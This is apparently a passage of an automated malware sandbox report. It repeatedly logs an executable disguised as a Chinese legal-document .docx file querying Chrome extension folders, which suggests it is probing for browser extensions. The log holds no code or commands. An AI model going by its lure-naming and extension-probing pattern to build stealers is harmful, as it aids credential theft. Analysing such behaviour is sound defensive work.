Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
